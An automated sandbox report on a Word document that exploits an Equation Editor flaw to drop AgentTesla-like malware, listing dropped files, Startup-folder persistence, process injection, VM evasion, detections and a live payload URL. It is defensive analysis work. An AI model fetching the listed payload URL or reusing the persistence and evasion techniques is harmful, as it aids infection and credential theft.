File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: IMG_05412_868_21.docx

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_002543F5 push edi; ret
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_002543FF push esi; ret

Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample	Static PE information: section name: .text entropy: 7.96408240927

Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\tthxx.exe	Jump to dropped file
Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Local\Temp\tthxx.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\tthxx.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\tthxx.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\tthxx.exe

Jump to dropped file

Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad			Jump to behavior
Source: C:\Users\user\tthxx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: tthxx.exe, 00000004.00000002.2241699219.0000000000580000.00000004.00000001.sdmp, tthxx.exe, 00000008.00000002.2243558018.0000000003331000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\tthxx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Window / User API: threadDelayed 9349
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Window / User API: threadDelayed 398

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2668	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\tthxx.exe TID: 3036	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\tthxx.exe TID: 2608	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\tthxx.exe TID: 2800	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2492	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2184	Thread sleep time: -180000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2184	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\tthxx.exe TID: 2228	Thread sleep time: -180000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3052	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3052	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2236	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2492	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2492	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2396	Thread sleep count: 9349 > 30
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2396	Thread sleep count: 398 > 30
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe TID: 2440	Thread sleep count: 96 > 30

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Last function: Thread delayed

Source: C:\Users\user\tthxx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Thread delayed: delay time: 30000

Source: tthxx.exe, 00000008.00000002.2243558018.0000000003331000.00000004.00000001.sdmp

Binary or memory string: vmware

Source: C:\Users\user\tthxx.exe

Process information queried: ProcessInformation

Source: C:\Users\user\tthxx.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Process token adjusted: Debug

Source: C:\Users\user\tthxx.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\tthxx.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\tthxx.exe

Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Show sources

Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 400000
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 402000
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 46C000
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 46E000
Source: C:\Users\user\tthxx.exe	Memory written: C:\Users\user\AppData\Local\Temp\tthxx.exe base: 7EFDE008

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: C:\Users\user\tthxx.exe	Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe

Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: tthxx.exe, 0000000B.00000002.2344826261.0000000000CF0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\tthxx.exe	Queries volume information: C:\Users\user\tthxx.exe VolumeInformation
Source: C:\Users\user\tthxx.exe	Queries volume information: C:\Users\user\tthxx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tthxx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\tthxx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tthxx.exe PID: 2312, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Registry Run Keys / Startup Folder11	Process Injection312	Masquerading111	OS Credential Dumping	Security Software Discovery311	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution12	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion131	Security Account Manager	Virtualization/Sandbox Evasion131	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection312	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing2	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery114	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IMG_05412_868_21.docx	30%	Virustotal		Browse
IMG_05412_868_21.docx	38%	ReversingLabs	Document.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Local\Temp\tthxx.exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\tthxx.exe	40%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.2.tthxx.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138720		Download File
4.2.tthxx.exe.338f020.4.unpack	100%	Avira	HEUR/AGEN.1110362		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://discord.com/2	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/6	0%	Avira URL Cloud	safe
http://31.210.20.6/3/44444.exe	7%	Virustotal		Browse
http://31.210.20.6/3/44444.exe	100%	Avira URL Cloud	malware
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://mNVnNH.com	0%	Avira URL Cloud	safe
https://discord.com/:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://31.210.20.6/3/44444.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org%GETMozilla/5.0	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://discord.com/2	tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
